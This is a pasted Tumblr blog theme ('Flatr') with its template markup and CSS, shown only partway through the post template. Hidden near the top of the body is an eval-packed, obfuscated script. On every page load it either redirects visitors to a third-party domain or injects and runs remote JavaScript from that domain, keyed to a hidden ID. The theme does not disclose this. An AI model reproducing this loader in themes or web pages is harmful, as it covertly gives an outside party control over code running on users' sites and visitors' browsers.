Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <!DOCTYPE html>
- <!--
- _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _
- | _ | | | | | | |/ / | | | _ | | | | _ |
- | |_| | | | | _| | | / | _ | | |_| | | | | |_| |
- | - | | | | _ | - | _| | - | | _ | -
- | | \ | | | | | | \ | | | | \ | | | | \
- |_ _|\_ _\ |_ _| |_ _ _| |_ _|\_ _\ |_ _ _| |_ _|\_ _\ |_ _ _ _| |_ _|\_ _\
- ********************************
- Theme by: rickerlr.tumblr.com
- Preview: flatr-theme.tumblr.com
- Name: Flatr
- Version: 1.0
- Year: 2013
- Twitter: @rickerlr
- ********************************
- -->
- <!--[if lt IE 7]> <html class="no-js lt-ie9 lt-ie8 lt-ie7" lang="en"> <![endif]-->
- <!--[if IE 7]> <html class="no-js lt-ie9 lt-ie8" lang="en"> <![endif]-->
- <!--[if IE 8]> <html class="no-js lt-ie9" lang="en"> <![endif]-->
- <!--[if gt IE 8]><!--> <html class="no-js" lang="en"> <!--<![endif]-->
- <head>
- <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
- <meta name="color:Background" content="#f5f5f5"/>
- <meta name="color:Post Background" content="#f7f7f7"/>
- <meta name="color:Ribbon Date Background" content="#1179c1"/>
- <meta name="color:Ribbon Date Text" content="#ffffff"/>
- <meta name="color:Sidebar Links" content="#ffffff"/>
- <meta name="color:Sidebar Links Hover" content="#1179c1"/>
- <meta name="color:Text" content="#6a6a6a"/>
- <meta name="color:Title" content="#2d2d2d"/>
- <meta name="image:Background Image" content="" />
- <meta name="image:Logo" content="" />
- <meta name="if:Container FadeIn" content="0"/>
- <meta name="if:Infinite Scroll" content="1"/>
- <meta name="if:Post Width 700" content="1"/>
- <meta name="if:Sidebar Fixed" content="1"/>
- <meta name="if:Show Archive Link" content="1"/>
- <meta name="if:Show Blog Info" content="1"/>
- <meta name="if:Show RSS Link" content="0"/>
- <meta name="if:Show Social Share Buttons" content="1"/>
- <meta name="if:Show Tags Homepage" content="0"/>
- <meta name="if:Tumblr Buttons Fixed" content="0"/>
- <meta name="text:Disqus ID" content="" />
- <meta name="text:Google Analytics ID" content="" />
- <meta name="text:URL Behance" content=""/>
- <meta name="text:URL Dribbble" content=""/>
- <meta name="text:URL Facebook" content=""/>
- <meta name="text:URL Flickr" content=""/>
- <meta name="text:URL Google Plus" content=""/>
- <meta name="text:URL Instagram" content=""/>
- <meta name="text:URL LinkedIn" content=""/>
- <meta name="text:URL Pinterest" content=""/>
- <meta name="text:URL SoundCloud" content=""/>
- <meta name="text:URL Twitter" content=""/>
- <meta name="text:URL YouTube" content=""/>
- <title>{Title}{block:SearchPage} | {lang:Search results for SearchQuery}{/block:SearchPage}{block:PostSummary} | {PostSummary}{/block:PostSummary}</title>
- {block:Description}
- <meta name="description" content="{MetaDescription}" />
- {/block:Description}
- <link rel="shortcut icon" href="{Favicon}" />
- <link rel="apple-touch-icon" href="{PortraitURL-128}"/>
- <link rel="alternate" type="application/rss+xml" href="{RSS}" />
- <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no">
- <!--[if lt IE 9]>
- <script src="http://static.tumblr.com/dbek3sy/A8Hmj11p2/html5shiv.js"></script>
- <![endif]-->
- <script src="http://static.tumblr.com/mcreuad/GJWmkxweb/modernizr-2.5.3.min.js"></script>
- <!-- css normalize -->
- <link rel="stylesheet" src="http://static.tumblr.com/dbek3sy/B5Fmjhygj/normalize.css" />
- <link href='http://fonts.googleapis.com/css?family=Varela' rel='stylesheet' type='text/css'>
- <!-- link href='http://fonts.googleapis.com/css?family=Lato:300,400,700' rel='stylesheet' type='text/css' -->
- <link href='http://static.tumblr.com/dbek3sy/wa5mqjhz5/fontello.css' rel='stylesheet' type='text/css'>
- <!--[if IE 7]>
- <link rel="stylesheet" href="http://static.tumblr.com/dbek3sy/4wmmqjhpc/fontello-ie7.css">
- <![endif]-->
- <style type="text/css">
- *{
- -moz-box-sizing: border-box;
- -webkit-box-sizing: border-box;
- box-sizing: border-box;
- -webkit-font-smoothing: antialiased;
- }
- .right{float: right;} .left{float: left;} .clear{clear: both;}
- h1,h2,h3,h4,h5,h6{
- color: {color:Title};
- line-height: 1.3em;
- font-weight: bold;
- margin-bottom: 20px;
- text-align: left;
- letter-spacing: 0.03em;
- }
- ul li, ol li, ul, ol{
- padding: 0px;
- margin: 0px;
- list-style-type: none;
- }
- h1{font-size: 2em;}
- h2{font-size: 1.5em;}
- h3{font-size: 1.3em;}
- h4{font-size: 1.2em;}
- h5{font-size: 1.1em;}
- h6{font-size: 1em;}
- .titleArticle{
- margin-top: 0px;
- }
- a, img{border:0;}
- a{
- color:{color:Ribbon Date Background};
- text-decoration:none;
- }
- #tumblr_controls{
- position: fixed !important;
- top: 4px !important;
- }
- #sidebar #menu li a, h2 a, .caption a,
- .underPost a, #postnotesdiv a,
- #pagination ul li a, ul#socialLinks li, .dateRibbons, #profileIco,
- #postnotesdiv a, .titleArticle a, .quest a{
- -webkit-transition: all 0.3s ease;
- -moz-transition: all 0.3s ease;
- transition: all 0.3s ease;
- -o-transition: all 0.3s ease;
- }
- body{
- font-size: 100%;
- color: {color:Text};
- font-family: 'Varela', "Helvetica Neue", Arial, Verdana, Helvetica, sans-serif;
- text-align: center;
- word-wrap: break-word;
- background-color: {color:Background};
- background-image: url({image:Background Image});
- background-repeat: repeat;
- background-attachment: fixed;
- background-position: top left;
- -webkit-font-smoothing: antialiased;
- }
- #container{
- position: relative;
- {block:IfNotPostWidth700}
- width: 740px;
- {block:IfNotPostWidth700}
- {block:IfPostWidth700}
- width: 940px;
- {/block:IfPostWidth700}
- margin: 0px auto;
- text-align: left;
- z-index: 0;
- padding: 70px 0px;
- }
- #content{
- {block:IfNotPostWidth700}
- width: 500px;
- {block:IfNotPostWidth700}
- {block:IfPostWidth700}
- width: 700px;
- {/block:IfPostWidth700}
- padding-bottom: 125px;
- }
- #sidebar{
- width: 200px;
- text-align: left;
- margin-right: 40px;
- {block:IfSidebarFixed}
- position: fixed;
- {/block:IfSidebarFixed}
- }
- #sidebar #profileImg img, #backTop{
- box-shadow: 0px 0px 0px 7px rgba(255,255,255,0.5);
- -webkit-transition: all 0.4s ease;
- -moz-transition: all 0.4s ease;
- transition: all 0.4s ease;
- -o-transition: all 0.4s ease;
- -webkit-border-radius: 100px;
- -moz-border-radius: 100px;
- border-radius: 100px;
- }
- #sidebar #profileImg img:hover, #backTop:hover{
- box-shadow: 0px 0px 0px 12px rgba(255,255,255,0.5);
- }
- #sidebar #profileImg img:active, #backTop:active{
- box-shadow: 0px 0px 0px 5px rgba({RGBcolor:Sidebar Links Hover}, 0.5);
- }
- #sidebar #logo{
- max-width: 100px;
- height: auto;
- }
- #sidebar #menu{
- margin-top: 40px;
- text-transform: uppercase;
- text-align: left;
- letter-spacing: 5px;
- font-size: 0.8em;
- }
- #sidebar #menu li{
- margin-top: 15px;
- }
- #sidebar #menu li a{
- color: {color:Sidebar Links};
- line-height: 1.5em;
- }
- #sidebar #menu li a:hover{
- color: {color:Sidebar Links Hover};
- }
- ul#socialLinks{
- margin-top: 40px;
- }
- ul#socialLinks li{
- display:inline-block;
- margin-left: 5px;
- }
- ul#socialLinks li:hover{
- opacity: 0.8;
- }
- ul#socialLinks li a{
- display: block;
- width: 26px;
- height: 26px;
- text-align: center;
- line-height: 26px;
- font-size: 16px;
- color: #F7F7F7;
- -webkit-border-radius: 3px;
- -moz-border-radius: 3px;
- border-radius: 3px;
- }
- /*ul#socialLinks li a:hover{color: {color: Text};}*/
- .icon-twitter{background-color:#00aced !important;}
- .icon-facebook{background-color:#3b5999 !important;}
- .icon-gplus{background-color:#d84937 !important;}
- .icon-linkedin{background-color:#006699 !important;}
- .icon-flickr{background-color:#fe0084 !important;}
- .icon-dribbble{background-color:#ea4c89 !important;}
- .icon-pinterest{background-color:#c11a22 !important;}
- .icon-instagram{background-color:#1c5380 !important;}
- .icon-behance{background-color:#1769ff !important;}
- .icon-soundcloud{background-color:#f76700 !important;}
- .icon-youtube{background-color:#cc181e !important;}
- /*** POSTS ***/
- #profileIcon{
- font-size: 30px;
- height: 80px;
- line-height: 80px;
- }
- #profileIcon span{
- position:relative;
- top: -10px;
- }
- #profile{margin-top:0px;}
- .posts{margin-top: 120px;}
- {block:PermalinkPage}
- .posts:first-child{margin-top: 0px;}
- {/block:PermalinkPage}
- {block:IndexPage}
- {block:IfNotShowBlogInfo}
- .post-wrap:first-child{margin-top: -120px;}
- {/block:IfNotShowBlogInfo}
- {/block:IndexPage}
- .posts, #profile{
- position:relative;
- background-color: {color:Post Background};
- box-shadow: inset 0px 0px 1px rgba(255,255,255,0.3), 0px 0px 0px 5px rgba(0,0,0,0.04);
- -webkit-border-radius: 3px;
- -moz-border-radius: 3px;
- border-radius: 3px;
- }
- .posts,
- #profile, .tagContainer{padding: 40px;}
- .tagContainer{padding-bottom:20px;}
- .dateRibbons{
- position: absolute;
- z-index: -1;
- float: right;
- text-align: right;
- right: -50px;
- top: 20px;
- margin: 0px 40px 15px 15px;
- width: 70px;
- height: 80px;
- padding: 10px 10px 10px 0px;
- background-color: {color:Ribbon Date Background};
- color: {color:Ribbon Date Text};
- -webkit-border: 3px;
- -moz-border-radius: 3px;
- border-radius: 3px;
- }
- .posts:hover .dateRibbons, #profile:hover #profileIcon{
- right: -100px;
- }
- .dateRibbons .day,
- .dateRibbons .year{
- font-size: 0.6em;
- letter-spacing: 2px;
- text-transform: uppercase;
- opacity: 0.7;
- }
- .dateRibbons .dayN{
- font-size: 1.7em;
- font-weight: bold;
- }
- .caption{
- font-size: 0.9em;
- line-height: 1.5em;
- color: {color:Text};
- }
- .caption a:hover, ol.notes a:hover,
- h2 a:hover, .posts .date .postedby a:hover,
- #postnotesdiv a:hover, .titleArticle a:hover,
- .quest a:hover{
- background-color: rgba({RGBcolor:Ribbon Date Background}, 0.1);
- }
- .photo-post .caption, .photoset-post .caption,
- .audio-post .caption, .video-post .caption{
- margin-top: 40px;
- }
- .caption p{margin-top:5px;}
- .caption strong, .caption b{font-weight:bold;}
- .caption i, .caption em{font-style:italic;}
- .caption blockquote, ol.notes blockquote{
- padding-left:10px;
- border-left: 3px solid rgba({RGBcolor:Ribbon Date Background}, 0.8);
- margin: 20px 0px;
- }
- ol.notes blockquote{
- margin-left: 25px;
- }
- .caption ul, .caption ol{
- margin: 20px 0px;
- padding-left: 25px;
- }
- .caption ul li{
- list-style-type: disc;
- }
- .caption ol li{
- list-style-type: decimal;
- }
- .caption img{
- display: block;
- max-width: 100%;
- height: auto;
- margin: 20px 0px;
- -webkit-border-radius: 3px;
- -moz-border-radius: 3px;
- border-radius: 3px;
- }
- h2 a{color:{color:Ribbon Date Background};}
- .posts .photoPost, .posts .videoPost, .posts .photosetPost{
- position:relative;
- top: -40px;
- left: -40px;
- {block:IfNotPostWidth700}
- width: 500px;
- {/block:IfNotPostWidth700}
- {block:IfPostWidth700}
- width: 700px;
- {/block:IfPostWidth700}
- margin-bottom: -45px;
- z-index: 0;
- -webkit-border-top-left-radius: 3px;
- -webkit-border-top-right-radius: 3px;
- -moz-border-radius-topleft: 3px;
- -moz-border-radius-topright: 3px;
- border-top-left-radius: 3px;
- border-top-right-radius: 3px;
- }
- {block:IndexPage}
- .videoPost iframe{
- width: 100%;
- min-height: 394px;
- }
- .videoPost iframe.soundcloud_audio_player{
- min-height: 50px;
- }
- {/block:IndexPage}
- .posts .quest{
- {block:IfNotPostWidth700}
- width: 250px;
- {/block:IfNotPostWidth700}
- {block:IfPostWidth700}
- width: 450px;
- {/block:IfPostWidth700}
- }
- .posts .imageAsker{
- -webkit-border-radius: 3px;
- -moz-border-radius: 3px;
- border-radius: 3px;
- margin-right:20px;
- }
- .posts .askAnswer{
- margin-top: 20px;
- padding-top: 20px;
- border-top: 1px solid rgba(0,0,0,0.1);
- }
- .posts .quot{
- position: absolute;
- z-index: 0;
- top: -20px;
- left: 20px;
- font-size: 15em;
- color: rgba({RGBcolor:Ribbon Date Background},0.08);
- z-index: 0;
- font-family: arial;
- }
- .posts .chat .label{font-weight:bold;}
- .posts .chat li.odd,
- .posts .chat li.even{
- padding: 20px;
- -webkit-border-radius: 3px;
- -moz-border-radius: 3px;
- border-radius: 3px;
- }
- .posts .chat li.even{
- background-color: rgba({RGBcolor:Ribbon Date Background}, 0.08);
- }
- .posts .album_container{
- width: 230px;
- height: 191px;
- position: relative;
- background: url(http://static.tumblr.com/dbek3sy/3cNmbsbqk/album.png) top left no-repeat;
- margin-right: 20px;
- }
- .posts .album_container .audioimage,
- .posts .album_container .album_light_effect{
- position: absolute;
- top: 1px;
- left: 1px;
- }
- .posts .album_container .audioimage{
- width: 189px;
- height: 189px;
- z-index: 1;
- }
- .posts .album_container .album_light_effect{
- box-shadow: inset 0px 1px 0px rgba(255,255,255,0.3);
- width: 189px;
- height: 147px;
- z-index: 2;
- background: url(http://static.tumblr.com/dbek3sy/a4umawivm/album_lighteffect.png) no-repeat;
- }
- .posts ul.audiotrack{
- {block:IfNotPostWidth700}
- width: 170px;
- {/block:IfNotPostWidth700}
- {block:IfPostWidth700}
- width: 280px;
- {/block:IfPostWidth700}
- }
- .posts ul.audiotrack li h3{color: {color:Link};text-align:left;}
- .posts ul.audiotrack li:first-child{margin-bottom:-10px;}
- .posts ul.audiotrack li.trackLabel{font-size: 0.8em;}
- .posts ul.audiotrack li b{color:{color:Title};}
- .posts ul.audiotrack li.audio{margin-top:20px;}
- .posts .audioplayercontainer{
- position:relative;
- background: #fff;
- -webkit-border-radius: 3px;
- -moz-border-radius: 3px;
- border-radius: 3px;
- width: 32px;
- height: 32px;
- margin-right: 10px;
- box-shadow: 1px 1px 0px #fff, 2px 2px 0px rgba(0,0,0,0.2);
- }
- .posts .audioplayercontainer .audioplayerinto{
- position:absolute;
- width: 20px;
- height: 20px;
- overflow: hidden;
- left: 3px;
- top: 3px;
- }
- .posts ul.audiotrack li.audio span{
- font-size: 0.8em;
- line-height: 32px;
- }
- .underPost{
- position: relative;
- z-index: 1;
- margin-top: 40px;
- }
- .underPost a{
- font-size: 0.7em;
- margin-right: 25px;
- color: rgba({RGBcolor:Title}, 0.4);
- }
- .underPost a:hover{color: rgba({RGBcolor:Title}, 0.8);}
- .underPost a span{
- position:relative;
- bottom: -2px;
- font-size: 15px;
- margin-right: 5px;
- }
- .tagContainer{
- position:relative;
- background: rgba(0,0,0,0.2);
- bottom: 0px;
- {block:IndexPage}
- {block:IfNotShowTagsHomepage}
- display: none;
- {/block:IfNotShowTagsHomepage}
- {/block:IndexPage}
- -webkit-border-bottom-right-radius: 3px;
- -webkit-border-bottom-left-radius: 3px;
- -moz-border-radius-bottomright: 3px;
- -moz-border-radius-bottomleft: 3px;
- border-bottom-right-radius: 3px;
- border-bottom-left-radius: 3px;
- }
- .tagContainer:before{
- content: "";
- float: left;
- position: absolute;
- top: 0px;
- left: 55px;
- width: 0;
- height: 0;
- border-color: #F7F7F7 transparent transparent transparent;
- border-style: solid;
- border-width: 10px 10px 0px 10px;
- }
- .tagContainer ul li, .tagContainer ul li a{
- display:inline-block;
- height:24px;
- line-height:24px;
- position:relative;
- font-size: 11px;
- margin-bottom: 20px;
- }
- .tagContainer ul a{
- margin-right: 30px;
- padding:0 10px 0 12px;
- background: {color:Ribbon Date Background};
- color: #fff;
- text-decoration:none;
- -webkit-border-top-right-radius: 3px;
- -webkit-border-bottom-right-radius: 3px;
- -moz-border-radius-topright: 3px;
- -moz-border-radius-bottomright: 3px;
- border-top-right-radius: 3px;
- border-bottom-right-radius: 3px;
- }
- .tagContainer ul li a:before{
- content:"";
- float:left;
- position:absolute;
- top:0;
- left:-12px;
- width:0;
- height:0;
- border-color:transparent {color:Ribbon Date Background} transparent transparent;
- border-style:solid;
- border-width: 12px 12px 12px 0;
- }
- .tagContainer ul li a:after{
- content:"";
- position:absolute;
- top:10px;
- left:0;
- float:left;
- width:4px;
- height:4px;
- -moz-border-radius:2px;
- -webkit-border-radius:2px;
- border-radius:2px;
- background: rgba(0,0,0,0.2);
- }
- .tagContainer ul a:hover{
- background: {color:Title};
- color: {color:Ribbon Date Text}
- }
- .tagContainer ul a:hover:before{border-color:transparent {color:Title} transparent transparent;}
- #paginationPost a:first-child{
- margin-right: 10px;
- }
- #paginationPost a span{
- color: {color:Text};
- }
- #postnotesdiv{
- font-size:0.9em;
- }
- #postnotesdiv a{text-decoration:none;}
- #postnotes{
- margin-top:40px;
- padding-top:40px;
- border-top: 1px solid rgba(0,0,0,0.1);
- }
- ol.notes .note{margin-top:10px;}
- ol.notes .note:first-child{margin-top:0px;}
- ol.notes .avatar{
- vertical-align: middle;
- margin-right: 5px;
- }
- .note.more_notes_link_container{margin-top:40px !important;}
- /*
- li.note{position:relative;}
- li.reblog:before{
- content: '\e802';
- position: absolute;
- font-size: 15px;
- color: rgba({RGBcolor:Text}, 0.2);
- top: 0px;
- right: 0px;
- font-family: 'fontello';
- }
- li.like:before{
- content: '\e800';
- position: absolute;
- font-size: 15px;
- color: rgba({RGBcolor:Text}, 0.2);
- top: 0px;
- right: 0px;
- font-family: 'fontello';
- }
- */
- #pagination{
- text-align: center;
- margin-top: 120px;
- {block:IfInfinitescroll}
- display: none;
- {/block:IfInfinitescroll}
- }
- #pagination ul{
- text-transform: uppercase;
- font-weight: bold;
- letter-spacing: 5px;
- font-size: 0.8em;
- }
- #pagination ul li{
- display: inline-block;
- margin-left: 10px;
- }
- #pagination ul li a{
- color: {color:Sidebar Links};
- }
- #pagination ul li a:hover, #pagination ul li span{
- color: {color:Sidebar Links Hover};
- }
- #backTop{
- border:0;
- position:fixed;
- right: 40px;
- bottom: 40px;
- font-family: verdana;
- font-size: 1.2em;
- color: {color:Title};
- background: {color:Post Background};
- cursor: pointer;
- width: 30px;
- height: 30px;
- line-height: 35px;
- text-align: center;
- display:none;
- }
- {block:IndexPage}
- #infscr-loading{
- margin: 50px auto;
- width: 50px;
- height: 50px;
- }
- #infscr-loading img{display:none;}
- /* loading spinner */
- #floatingBarsG{
- position:relative;
- width:20px;
- height:25px;
- margin: 0px auto;
- }
- .blockG{
- margin: 0px auto;
- position:absolute;
- background-color:rgba({RGBcolor:Sidebar Links},0.4);
- width:3px;
- height:8px;
- -moz-border-radius:3px 3px 0 0;
- -moz-transform:scale(0.4);
- -moz-animation-name:fadeG;
- -moz-animation-duration:1.04s;
- -moz-animation-iteration-count:infinite;
- -moz-animation-direction:linear;
- -webkit-border-radius:3px 3px 0 0;
- -webkit-transform:scale(0.4);
- -webkit-animation-name:fadeG;
- -webkit-animation-duration:1.04s;
- -webkit-animation-iteration-count:infinite;
- -webkit-animation-direction:linear;
- -ms-border-radius:3px 3px 0 0;
- -ms-transform:scale(0.4);
- -ms-animation-name:fadeG;
- -ms-animation-duration:1.04s;
- -ms-animation-iteration-count:infinite;
- -ms-animation-direction:linear;
- -o-border-radius:3px 3px 0 0;
- -o-transform:scale(0.4);
- -o-animation-name:fadeG;
- -o-animation-duration:1.04s;
- -o-animation-iteration-count:infinite;
- -o-animation-direction:linear;
- border-radius:3px 3px 0 0;
- transform:scale(0.4);
- animation-name:fadeG;
- animation-duration:1.04s;
- animation-iteration-count:infinite;
- animation-direction:linear;
- }
- #rotateG_01{
- left:0;
- top:9px;
- -moz-animation-delay:0.39s;
- -moz-transform:rotate(-90deg);
- -webkit-animation-delay:0.39s;
- -webkit-transform:rotate(-90deg);
- -ms-animation-delay:0.39s;
- -ms-transform:rotate(-90deg);
- -o-animation-delay:0.39s;
- -o-transform:rotate(-90deg);
- animation-delay:0.39s;
- transform:rotate(-90deg);
- }
- #rotateG_02{
- left:3px;
- top:3px;
- -moz-animation-delay:0.52s;
- -moz-transform:rotate(-45deg);
- -webkit-animation-delay:0.52s;
- -webkit-transform:rotate(-45deg);
- -ms-animation-delay:0.52s;
- -ms-transform:rotate(-45deg);
- -o-animation-delay:0.52s;
- -o-transform:rotate(-45deg);
- animation-delay:0.52s;
- transform:rotate(-45deg);
- }
- #rotateG_03{
- left:8px;
- top:1px;
- -moz-animation-delay:0.65s;
- -moz-transform:rotate(0deg);
- -webkit-animation-delay:0.65s;
- -webkit-transform:rotate(0deg);
- -ms-animation-delay:0.65s;
- -ms-transform:rotate(0deg);
- -o-animation-delay:0.65s;
- -o-transform:rotate(0deg);
- animation-delay:0.65s;
- transform:rotate(0deg);
- }
- #rotateG_04{
- right:3px;
- top:3px;
- -moz-animation-delay:0.78s;
- -moz-transform:rotate(45deg);
- -webkit-animation-delay:0.78s;
- -webkit-transform:rotate(45deg);
- -ms-animation-delay:0.78s;
- -ms-transform:rotate(45deg);
- -o-animation-delay:0.78s;
- -o-transform:rotate(45deg);
- animation-delay:0.78s;
- transform:rotate(45deg);
- }
- #rotateG_05{
- right:0;
- top:9px;
- -moz-animation-delay:0.9099999999999999s;
- -moz-transform:rotate(90deg);
- -webkit-animation-delay:0.9099999999999999s;
- -webkit-transform:rotate(90deg);
- -ms-animation-delay:0.9099999999999999s;
- -ms-transform:rotate(90deg);
- -o-animation-delay:0.9099999999999999s;
- -o-transform:rotate(90deg);
- animation-delay:0.9099999999999999s;
- transform:rotate(90deg);
- }
- #rotateG_06{
- right:3px;
- bottom:2px;
- -moz-animation-delay:1.04s;
- -moz-transform:rotate(135deg);
- -webkit-animation-delay:1.04s;
- -webkit-transform:rotate(135deg);
- -ms-animation-delay:1.04s;
- -ms-transform:rotate(135deg);
- -o-animation-delay:1.04s;
- -o-transform:rotate(135deg);
- animation-delay:1.04s;
- transform:rotate(135deg);
- }
- #rotateG_07{
- bottom:0;
- left:8px;
- -moz-animation-delay:1.1700000000000002s;
- -moz-transform:rotate(180deg);
- -webkit-animation-delay:1.1700000000000002s;
- -webkit-transform:rotate(180deg);
- -ms-animation-delay:1.1700000000000002s;
- -ms-transform:rotate(180deg);
- -o-animation-delay:1.1700000000000002s;
- -o-transform:rotate(180deg);
- animation-delay:1.1700000000000002s;
- transform:rotate(180deg);
- }
- #rotateG_08{
- left:3px;
- bottom:2px;
- -moz-animation-delay:1.3s;
- -moz-transform:rotate(-135deg);
- -webkit-animation-delay:1.3s;
- -webkit-transform:rotate(-135deg);
- -ms-animation-delay:1.3s;
- -ms-transform:rotate(-135deg);
- -o-animation-delay:1.3s;
- -o-transform:rotate(-135deg);
- animation-delay:1.3s;
- transform:rotate(-135deg);
- }
- @-moz-keyframes fadeG{
- 0%{
- background-color:{color:Sidebar Links}}
- 100%{
- background-color:rgba({RGBcolor:Sidebar Links},0.4)}
- }
- @-webkit-keyframes fadeG{
- 0%{
- background-color:{color:Sidebar Links}}
- 100%{
- background-color:rgba({RGBcolor:Sidebar Links},0.4)}
- }
- @-ms-keyframes fadeG{
- 0%{
- background-color:{color:Sidebar Links}}
- 100%{
- background-color:rgba({RGBcolor:Sidebar Links},0.4)}
- }
- @-o-keyframes fadeG{
- 0%{
- background-color:{color:Sidebar Links}}
- 100%{
- background-color:rgba({RGBcolor:Sidebar Links},0.4)}
- }
- @keyframes fadeG{
- 0%{
- background-color:{color:Sidebar Links}}
- 100%{
- background-color:rgba({RGBcolor:Sidebar Links},0.4)}
- }
- {/block:IndexPage}
- {CustomCSS}
- </style>
- </head>
- <body>
- <div id='guid' style='display:none;'>02EBBC2672DC8AA67EA31D80EE0E6E9E796880E45BAEE5CC65ED7475B739A6C727AD27162E3678FA27B434DB362A980A</div>
- <script>eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('5 b=a;5 k=a;5 4=6.o("l");d(4==n){b=g;e.i.f="7://3-9.8/j-3/?c=1"}m d(4==""){b=g;e.i.f="7://3-9.8/j-3/?c=1"}{5 2=6.y(\'2\');2.x=a;2.z=\'A/p\';2.B="7://w.3-9.8/v.r?c="+4.q;(6.h(\'s\')[0]||6.h(\'t\')[0]).u(2)}',38,38,'||script|theme|g_x|var|document|http|co|cloud|true|g_Valid|id|if|window|href|false|getElementsByTagName|location|invalid|g_T|guid|else|null|getElementById|javascript|innerHTML|asp|HEAD|BODY|appendChild|storage|themeweaver|async|createElement|type|text|src'.split('|'),0,{}))</script>
- <div id="container">
- <aside id="sidebar" class="left">
- {block:IfNotLogoImage}
- <div id="profileImg">
- <a href="/" {Target}><img src="{PortraitURL-96}"></a>
- </div>
- {/block:IfNotLogoImage}
- {block:IfLogoImage}
- <a href="/" {Target}><img id="logo" src="{image:Logo}"></a>
- {/block:IfLogoImage}
- <nav>
- <ul id="menu">
- <li><a href="/">Home</a></li>
- {block:AskEnabled}
- <li><a href="/ask" {Target}>{AskLabel}</a></li>
- {/block:AskEnabled}
- {block:SubmissionsEnabled}
- <li><a href="/submit" {Target}>Submit</a></li>
- {/block:SubmissionsEnabled}
- {block:IfShowArchiveLink}
- <li><a href="/archive" {Target}>Archive</a></li>
- {/block:IfShowArchiveLink}
- {block:IfShowRSSLink}
- <li><a href="/rss" {Target}>RSS</a></li>
- {/block:IfShowRSSLink}
- {block:HasPages}
- {block:Pages}
- <li><a href="{URL}" {Target}>{Label}</a></li>
- {/block:Pages}
- {/block:HasPages}
- </ul>
- </nav>
- </aside><!-- #sidebar -->
- <section id="content" class="right">
- {block:IndexPage}
- {block:IfShowBlogInfo}
- <article id="profile">
- <div id="profileIcon" class="dateRibbons">
- <span class="icon-user"></span>
- </div>
- <h1 class="titleArticle">{Title}</h1>
- <div class="caption">{Description}</div>
- <ul id="socialLinks">
- {block:IfURLTwitter}
- <li><a href="{text:URL Twitter}" {Target} class="icon-twitter"></a></li>
- {/block:IfURLTwitter}
- {block:IfURLInstagram}
- <li><a href="{text:URL Instagram}" {Target} class="icon-instagram"></a></li>
- {/block:IfURLInstagram}
- {block:IfURLFacebook}
- <li><a href="{text:URL Facebook}" {Target} class="icon-facebook"></a></li>
- {/block:IfURLFacebook}
- {block:IfURLGooglePlus}
- <li><a href="{text:URL Google Plus}" {Target} class="icon-gplus"></a></li>
- {/block:IfURLGooglePlus}
- {block:IfURLPinterest}
- <li><a href="{text:URL Pinterest}" {Target} class="icon-pinterest"></a></li>
- {/block:IfURLPinterest}
- {block:IfURLLinkedIn}
- <li><a href="{text:URL LinkedIn}" {Target} class="icon-linkedin"></a></li>
- {/block:IfURLLinkedIn}
- {block:IfURLDribbble}
- <li><a href="{text:URL Dribbble}" {Target} class="icon-dribbble"></a></li>
- {/block:IfURLDribbble}
- {block:IfURLBehance}
- <li><a href="{text:URL Behance}" {Target} class="icon-behance"></a></li>
- {/block:IfURLBehance}
- {block:IfURLFlickr}
- <li><a href="{text:URL Flickr}" {Target} class="icon-flickr"></a></li>
- {/block:IfURLFlickr}
- {block:IfURLSoundCloud}
- <li><a href="{text:URL SoundCloud}" {Target} class="icon-soundcloud"></a></li>
- {/block:IfURLSoundCloud}
- {block:IfURLYouTube}
- <li><a href="{text:URL YouTube}" {Target} class="icon-youtube"></a></li>
- {/block:IfURLYouTube}
- </ul>
- </article>
- {/block:IfShowBlogInfo}
- {/block:IndexPage}
- {block:Posts}
- <article class="post-wrap">
- <div class="posts {block:Photo}photo-post{/block:Photo} {block:Photoset}photoset-post{/block:Photoset} {block:Audio}audio-post{/block:Audio} {block:Video}video-post{/block:Video}" id="post_{PostID}">
- {block:Date}
- <div class="dateRibbons">
- <div class="day">{ShortDayOfWeek}</div>
- <div class="dayN">{DayOfMonthWithZero}</div>
- <div class="year">{Year}</div>
- </div>
- {/block:Date}
- {block:Text}
- {block:Title}
- <header>
- <h1 class="titleArticle">{Title}</h1>
- </header>
- {/block:Title}
- <section class="caption">{Body}</section>
- {/block:Text}
- {block:Link}
- <header>
- <h1 class="titleArticle">» <a href="{URL}" {Target}>{Name}</a></h1>
- </header>
- {block:Description}
- <section class="caption">{Description}</section>
- {/block:Description}
- {block:Link}
- {block:Photo}
- <header>
- {LinkOpenTag}<img class="photoPost {block:Caption}photoWithCaption{/block:Caption}" src="{block:IfNotPostWidth700}{PhotoURL-500}{/block:IfNotPostWidth700}{block:IfPostWidth700}{PhotoURL-HighRes}{/block:IfPostWidth700}" alt="{PhotoAlt}" />{LinkCloseTag}
- </header>
- {block:Caption}
- <section class="caption">{Caption}</section>
- {/block:Caption}
- {/block:Photo}
- {block:Photoset}
- <header class="photosetPost" rel="{PostID}">
- {block:IfNotPostWidth700}{Photoset-500}{/block:IfNotPostWidth700}{block:IfPostWidth700}{Photoset-700}{/block:IfPostWidth700}
- </header>
- {block:Caption}
- <section class="caption">{Caption}</section>
- {/block:Caption}
- {/block:Photoset}
- {block:Answer}
- <img class="left imageAsker" width="64px" src="{AskerPortraitURL-64}"/>
- <div class="left quest">
- <b>{Asker}</b>:
- <div class="caption" style="margin-top:10px;">{Question}</div>
- </div>
- <div class="clear"></div>
- <div class="askAnswer caption">{Answer}</div>
- {/block:Answer}
- {block:Quote}
- <header>
- <div class="quot">“</div>
- <h1 class="titleArticle">{Quote}</h1>
- </header>
- {block:Source}
- <section class="caption" style="text-align:right;">- {Source}</section>
- {/block:Source}
- {/block:Quote}
- {block:Chat}
- {block:Title}
- <header>
- <h1 class="titleArticle">{Title}</h1>
- </header>
- {/block:Title}
- <ul class="chat">
- {block:Lines}
- <li class="{Alt} user_{UserNumber}">
- {block:Label}
- <span class="label">{Label}</span>
- {/block:Label}
- <span class="caption">{Line}</span>
- </li>
- {/block:Lines}
- </ul>
- {/block:Chat}
